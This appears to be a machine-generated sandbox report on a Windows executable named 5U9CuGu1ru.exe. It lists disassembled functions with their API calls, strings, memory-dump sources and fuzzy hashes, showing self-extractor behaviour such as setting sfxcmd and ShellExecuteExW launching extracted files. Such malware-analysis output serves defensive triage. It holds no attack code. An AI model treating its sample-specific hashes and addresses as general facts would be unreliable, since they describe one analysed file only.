Opcode Fuzzy Hash: 558f6a0136b06af741eb061037b654fa37e60fa5f1a98cd19b6fb849b07cbecb
Instruction Fuzzy Hash: 25D14AB1508784ABD7249F94DC49BDBBAE8FFC4705F40091DF689D6250DBB4868C8FA2

Function 0081BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0081BDFA

Part of subcall function 0081AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0081AAFE

SetWindowTextW.USER32(?,?), ref: 0081C127
_wcsrchr.LIBVCRUNTIME ref: 0081C2B1
GetDlgItem.USER32(?,00000066), ref: 0081C2EC
SetWindowTextW.USER32(00000000,?), ref: 0081C2FC
SendMessageW.USER32(00000000,00000143,00000000,0084A472), ref: 0081C30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0081C335

Strings

%s.%d.tmp, xrefs: 0081BFF6
ProgramFilesDir, xrefs: 0081C1FB
Software\Microsoft\Windows\CurrentVersion, xrefs: 0081C1D0
<br>, xrefs: 0081C08A

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: cfe64a1a46c06e36ddd7bdd2f4f38f3e79049aa11aeebc28dc0e963fe37def7e
Instruction ID: 4bc8e5a100f55c260ce35f322a63a2fa255a7cbe187ab7d752f433dbcce75385
Opcode Fuzzy Hash: cfe64a1a46c06e36ddd7bdd2f4f38f3e79049aa11aeebc28dc0e963fe37def7e
Instruction Fuzzy Hash: 90E17FB2D44628AADB25DBA4DC45DEF777CFF08311F0041A6FA09E3191EB749AC48B51

Function 0080D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0080D346
_wcschr.LIBVCRUNTIME ref: 0080D367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0080D328,?), ref: 0080D382
__fprintf_l.LIBCMT ref: 0080D873

Part of subcall function 0081137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0080B652,00000000,?,?,?,00010450), ref: 00811396

Strings

*messages***, xrefs: 0080D4D3
R, xrefs: 0080D4E5
*messages***, xrefs: 0080D49A
@%s:, xrefs: 0080D85D, 0080D869
,, xrefs: 0080D8AE
RTL, xrefs: 0080D838
a, xrefs: 0080D4EF
, xrefs: 0080D67A
$%s:, xrefs: 0080D856

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-980926923
Opcode ID: ae2ec19b9f21cacf91fe2c6661dfb7cc4a244bd5fcfa1f258b0f3509ba470c21
Instruction ID: 73be4bec107a921c2d000b0ae009e5d8c2ee984b6628247c7155c58c33f80efb
Opcode Fuzzy Hash: ae2ec19b9f21cacf91fe2c6661dfb7cc4a244bd5fcfa1f258b0f3509ba470c21
Instruction Fuzzy Hash: AD12C071A003199ADB64DFE8DC82BEEB7B5FF44304F104569E605E72C2EB709A84CB65

Function 0081CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0081AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0081AC85
Part of subcall function 0081AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0081AC96
Part of subcall function 0081AC74: IsDialogMessageW.USER32(00010450,?), ref: 0081ACAA
Part of subcall function 0081AC74: TranslateMessage.USER32(?), ref: 0081ACB8
Part of subcall function 0081AC74: DispatchMessageW.USER32(?), ref: 0081ACC2

GetDlgItem.USER32(00000068,0085ECB0), ref: 0081CB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0081A632,00000001,?,?,0081AECB,00834F88,0085ECB0), ref: 0081CB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0081CBA1
SendMessageW.USER32(00000000,000000C2,00000000,008335B4), ref: 0081CBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0081CBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0081CBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0081CC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0081CC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0081CC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0081CC67
SendMessageW.USER32(00000000,000000C2,00000000,0083431C), ref: 0081CC76

Strings

\, xrefs: 0081CBCF

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: c3cace8c4ebf533987495cfb6e7ffef3860f2c67fc3229b598ba2261d5fbe27a
Instruction ID: 9f0790fa27c73bb096066853c1e219562091c55bb906a6fe0d1544c6948ecf08
Opcode Fuzzy Hash: c3cace8c4ebf533987495cfb6e7ffef3860f2c67fc3229b598ba2261d5fbe27a
Instruction Fuzzy Hash: 6731AB71185B52ABE301DF209C4AFAB7EACFB82714F010518FA51D62D1DBA45908CBBB

Function 0081CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 0081CF54
ShowWindow.USER32(?,00000000), ref: 0081CF93
GetExitCodeProcess.KERNEL32(?,?), ref: 0081CFCF
CloseHandle.KERNEL32(?), ref: 0081CFF5
ShowWindow.USER32(?,00000001), ref: 0081D084

Part of subcall function 008117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0080BB05,00000000,.exe,?,?,00000800,?,?,008185DF,?), ref: 008117C2

Strings

, xrefs: 0081CEA2
.exe, xrefs: 0081CFFF
.inf, xrefs: 0081CF10

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 9c816db67a28f93dc96e43e64f0d1b6133cf5da678687ede5c9475e267a5668e
Instruction ID: 0fb173ea2273ed80f06a09a89ed56c34901487c1e72459e89968d9a54039528d
Opcode Fuzzy Hash: 9c816db67a28f93dc96e43e64f0d1b6133cf5da678687ede5c9475e267a5668e
Instruction Fuzzy Hash: 8261DE70448B80AADB319F24D804AEBBBEEFF85304F044819F5C5D7251DBB599CACB92

Function 0082A058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00824E35,00824E35,?,?,?,0082A2A9,00000001,00000001,3FE85006), ref: 0082A0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0082A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0082A138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0082A232
__freea.LIBCMT ref: 0082A23F

Part of subcall function 00828518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0082C13D,00000000,?,008267E2,?,00000008,?,008289AD,?,?,?), ref: 0082854A

__freea.LIBCMT ref: 0082A248
__freea.LIBCMT ref: 0082A26D

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 5d5e507fe6f65517d8e8d78d77bd3aec429310dd2df805ee120eb2c6ea989dab
Instruction ID: e62e1ba48353a8d6ee877cbd4a47ccab26d905bac5f95a32d51ec69b9cf7fcde
Opcode Fuzzy Hash: 5d5e507fe6f65517d8e8d78d77bd3aec429310dd2df805ee120eb2c6ea989dab
Instruction Fuzzy Hash: 5C519F72610226EFDB298E64EC41EBB77AAFF44B60F154629FC05D6140EB35DCD0C6A2

Function 0081A2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0081A2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 0081A315

Part of subcall function 008117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0080BB05,00000000,.exe,?,?,00000800,?,?,008185DF,?), ref: 008117C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0081A305

Strings

@Ut, xrefs: 0081A315
EDIT, xrefs: 0081A2E9, 0081A2F4, 0081A301

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: 35a1eef244258d5d6db76eafb72fc5994946d3272d285e48a885d1a3c1fd9d05
Instruction ID: 5bea2574cf766ec3f69683159706d8b0b0f2a4e8926db9f80cde7fabadc11a01
Opcode Fuzzy Hash: 35a1eef244258d5d6db76eafb72fc5994946d3272d285e48a885d1a3c1fd9d05
Instruction Fuzzy Hash: 83F08232A02A2877E7205A64AD09FDB776CFF46B50F051096FE45E2280D7A0A985C6F7

Function 0081A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00810085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008100A0
Part of subcall function 00810085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0080EB86,Crypt32.dll,00000000,0080EC0A,?,?,0080EBEC,?,?,?), ref: 008100C2

OleInitialize.OLE32(00000000), ref: 0081A34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0081A385
SHGetMalloc.SHELL32(00848430), ref: 0081A38F

Strings

3Qo, xrefs: 0081A366
riched20.dll, xrefs: 0081A33D

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Qo
API String ID: 3498096277-4232643773
Opcode ID: e09e28dcc7e4edca2cf4d384c0a37e0d060f71f4ed69fa6fc79926a33f81f06c
Instruction ID: 45c8ac093c374d70a9812070a9c604febf93c50d57e1decb31a352872c99eabf
Opcode Fuzzy Hash: e09e28dcc7e4edca2cf4d384c0a37e0d060f71f4ed69fa6fc79926a33f81f06c
Instruction Fuzzy Hash: CCF0ECB1D00609ABDB10AF9998499EFFBFCFF95701F00415AE914E2240DBB856458BA1

Function 008099B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008078AD,?,00000005,?,00000011), ref: 00809A4C
GetLastError.KERNEL32(?,?,008078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00809A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,008078AD,?,00000005,?), ref: 00809A8E
GetLastError.KERNEL32(?,?,008078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00809A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00809ADB

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 14c54dfc611fed395b43a0e6e33537ec3a1009f155a203b7a2469c606e7da78d
Instruction ID: 1b502e61b6c85a5a6e770a8b73b5453b71c31a67577f36fc01fe636994d04bb5
Opcode Fuzzy Hash: 14c54dfc611fed395b43a0e6e33537ec3a1009f155a203b7a2469c606e7da78d
Instruction Fuzzy Hash: 6D415830644B566FE3308B24CC05BDABBD4FB45324F100719F9E4D61D2E7B5A988CBA2

Function 0081AC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0081AC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0081AC96
IsDialogMessageW.USER32(00010450,?), ref: 0081ACAA
TranslateMessage.USER32(?), ref: 0081ACB8
DispatchMessageW.USER32(?), ref: 0081ACC2

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 9715975923882e616f6676bdefea762ff7ef24c7c904b2decb87f4dc38e18085
Instruction ID: 961e6d1809c8db9143d46fb7a652ac623de4cfbf93457dda28bbf06326ecdfcc
Opcode Fuzzy Hash: 9715975923882e616f6676bdefea762ff7ef24c7c904b2decb87f4dc38e18085
Instruction Fuzzy Hash: 73F01D71902529AB8B209BE1EC4CDEB7F6CFE052A17404555F505D2140EA64D545CBF2

Function 008276BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\5U9CuGu1ru.exe,00000104), ref: 008276FD
_free.LIBCMT ref: 008277C8
_free.LIBCMT ref: 008277D2

Strings

C:\Users\user\Desktop\5U9CuGu1ru.exe, xrefs: 008276F4, 008276FB, 0082772A, 00827762

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\5U9CuGu1ru.exe
API String ID: 2506810119-2745502151
Opcode ID: a8a223cb307c5d5fefc87201618f34c65db4cd70239d0b25a3024b7983eff890
Instruction ID: 0a94316f27d80dba06de519fe8c8f02052a562160d3a8decbd128ff542a3da19
Opcode Fuzzy Hash: a8a223cb307c5d5fefc87201618f34c65db4cd70239d0b25a3024b7983eff890
Instruction Fuzzy Hash: 47318175A09228EFDF21DF9AEC8599EBBECFB95310B1440A6E804D7211DAB04EC0CB51

Function 0081D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0081D29D
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0081D2D9

Strings

sfxcmd, xrefs: 0081D298
sfxpar, xrefs: 0081D2D4

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: f611df85f832f23b6063204764e36a521c688b0ae1de1dfe2fe45d71b0d7fb3e
Instruction ID: 895f2c4051d4e584f92c86be5b9a48dcfc09ef689aa60a2bcb9d3fe2b95eaeaf
Opcode Fuzzy Hash: f611df85f832f23b6063204764e36a521c688b0ae1de1dfe2fe45d71b0d7fb3e
Instruction Fuzzy Hash: FBF08C72800628A7DB202F949C1ABEABB6CFF09B51B004411FD84E6242D675DD809AE2

Function 0080984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0080985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00809876
GetLastError.KERNEL32 ref: 008098A8
GetLastError.KERNEL32 ref: 008098C7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 012ba828cca715a963a85f1bf6e1f53a1495433a84fb3eed7c33222505227ef1
Instruction ID: 7b50c28daf2c2fadc528f2e5d77731d237aac4f6730f140dedd0b7470408e477
Opcode Fuzzy Hash: 012ba828cca715a963a85f1bf6e1f53a1495433a84fb3eed7c33222505227ef1
Instruction Fuzzy Hash: 4F118E30900608EBDBA45B55CD04A7977ACFB46731F10C53AF8AAC5BD2D7359E409F52

Function 0082A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0080CFE0,00000000,00000000,?,0082A49B,0080CFE0,00000000,00000000,00000000,?,0082A698,00000006,FlsSetValue), ref: 0082A526
GetLastError.KERNEL32(?,0082A49B,0080CFE0,00000000,00000000,00000000,?,0082A698,00000006,FlsSetValue,00837348,00837350,00000000,00000364,?,00829077), ref: 0082A532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0082A49B,0080CFE0,00000000,00000000,00000000,?,0082A698,00000006,FlsSetValue,00837348,00837350,00000000), ref: 0082A540

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 5c9958e5f4e5b67c1cc4289e68ecb2e163638b0b2bc33faa1ce0a9c1aff8feca
Instruction ID: 62b725f2570a10f0caad427ccb6bc0361895df3186df009eefaa3df0748a7df8
Opcode Fuzzy Hash: 5c9958e5f4e5b67c1cc4289e68ecb2e163638b0b2bc33faa1ce0a9c1aff8feca
Instruction Fuzzy Hash: 86012B32711636ABC7258BE8FD44A577B9CFF85FA17240921F906D7140D735D940CAE1

Function 00809F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0080CC94,00000001,?,?,?,00000000,00814ECD,?,?,?), ref: 00809F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00814ECD,?,?,?,?,?,00814972,?), ref: 00809F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0080CC94,00000001,?,?), ref: 00809FB8

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 7f0ad6d8bb1a827f26d5768bd5369798f55f225ea4be465db49d1af210478ac6
Instruction ID: 425d3e9cce799aae76dd3699ccfc0d62a17333188a362cc4b953b82398a1713b
